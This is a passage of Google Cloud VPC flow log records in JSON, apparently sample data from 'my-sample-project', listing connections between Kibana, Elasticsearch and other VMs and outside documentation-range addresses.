:50:17.291787305Z"} -{"insertId":"198begsfh44xxz","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"203.0.113.27","dest_port":34450,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:47:38.299054333Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:47:38.189569840Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"198begsfh44xxy","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":60122},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:41:39.207635184Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:41:39.087226326Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"198begsfh44xxu","jsonPayload":{"bytes_sent":"102119","connection":{"dest_ip":"203.0.113.58","dest_port":53879,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.312105537Z","packets_sent":"608","reporter":"SRC","rtt_msec":"176","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.760414869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"198begsfh44xxo","jsonPayload":{"bytes_sent":"1794","connection":{"dest_ip":"203.0.113.27","dest_port":60968,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:43:39.777977145Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:43:39.653136947Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"198begsfh44xy0","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":60756},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:43:11.032929292Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:43:10.912193869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"198begsfh44xxw","jsonPayload":{"bytes_sent":"67013","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65275},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.316847800Z","packets_sent":"710","reporter":"DEST","rtt_msec":"82","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.565734921Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"198begsfh44xy5","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"198.51.100.182","dest_port":14236,"protocol":6,"src_ip":"10.139.99.242","src_port":22},"dest_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"end_time":"2019-06-14T03:40:09.257387426Z","packets_sent":"1","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.247072525Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"19im82tfdygznq","jsonPayload":{"bytes_sent":"64427","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33542},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108524Z","packets_sent":"351","reporter":"DEST","rtt_msec":"173","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150870105Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzn6","jsonPayload":{"bytes_sent":"183366","connection":{"dest_ip":"10.87.40.76","dest_port":33690,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"242","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075665334Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygznk","jsonPayload":{"bytes_sent":"185295","connection":{"dest_ip":"10.87.40.76","dest_port":33562,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:49.549471457Z","packets_sent":"244","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygznm","jsonPayload":{"bytes_sent":"68961","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":49438},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220725956Z","packets_sent":"711","reporter":"DEST","rtt_msec":"114","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.398463104Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzob","jsonPayload":{"bytes_sent":"62072","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33532},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565272745Z","packets_sent":"360","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.072372604Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygznc","jsonPayload":{"bytes_sent":"198326","connection":{"dest_ip":"10.87.40.76","dest_port":33590,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"246","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.146956782Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygznj","jsonPayload":{"bytes_sent":"61436","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33550},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"362","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzo5","jsonPayload":{"bytes_sent":"66791","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33690},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"355","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075665334Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzod","jsonPayload":{"bytes_sent":"1457","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":54812},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:45:20.708994883Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:45:20.595119257Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzna","jsonPayload":{"bytes_sent":"64466","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33562},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:49.549471457Z","packets_sent":"363","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzng","jsonPayload":{"bytes_sent":"174524","connection":{"dest_ip":"10.87.40.76","dest_port":33968,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.965294083Z","packets_sent":"66","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.480272197Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzo1","jsonPayload":{"bytes_sent":"181624065","connection":{"dest_ip":"10.49.136.133","dest_port":52780,"protocol":6,"src_ip":"203.0.113.228","src_port":9243},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"simianhacker-demo","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:58.592579489Z","packets_sent":"28344","reporter":"DEST","rtt_msec":"91","src_location":{"asn":16509,"city":"Boardman","continent":"America","country":"usa","region":"Oregon"},"start_time":"2019-06-14T03:40:17.183499423Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzo8","jsonPayload":{"bytes_sent":"1460","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.0.2.117","src_port":51348},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:41:20.754300982Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:41:20.630975303Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzoa","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"192.0.2.12","dest_port":44128,"protocol":6,"src_ip":"10.73.186.17","src_port":22},"dest_location":{"asn":4837,"city":"Binzhou","continent":"Asia","country":"chn","region":"Shandong"},"end_time":"2019-06-14T03:45:22.081121292Z","packets_sent":"1","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"infraops-docker-data","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:45:22.080963433Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzn7","jsonPayload":{"bytes_sent":"11137","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33968},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.965294083Z","packets_sent":"95","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.480272197Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygznf","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"198.51.100.107","dest_port":54812,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:45:20.708994883Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:45:20.595119257Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzni","jsonPayload":{"bytes_sent":"21792","connection":{"dest_ip":"203.0.113.134","dest_port":33564,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597079770Z","packets_sent":"186","reporter":"SRC","rtt_msec":"340","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.866944869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzns","jsonPayload":{"bytes_sent":"74370","connection":{"dest_ip":"203.0.113.58","dest_port":49438,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220725956Z","packets_sent":"580","reporter":"SRC","rtt_msec":"114","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.398463104Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygznp","jsonPayload":{"bytes_sent":"138337","connection":{"dest_ip":"10.87.40.76","dest_port":33550,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"244","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzo9","jsonPayload":{"bytes_sent":"30062","connection":{"dest_ip":"192.0.2.177","dest_port":60110,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:46.020466750Z","packets_sent":"124","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:10.874529937Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzo3","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"192.0.2.117","dest_port":51348,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:41:20.754300982Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:41:20.630975303Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygznz","jsonPayload":{"bytes_sent":"152218","connection":{"dest_ip":"203.0.113.134","dest_port":33560,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565026127Z","packets_sent":"243","reporter":"SRC","rtt_msec":"116","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.076060079Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 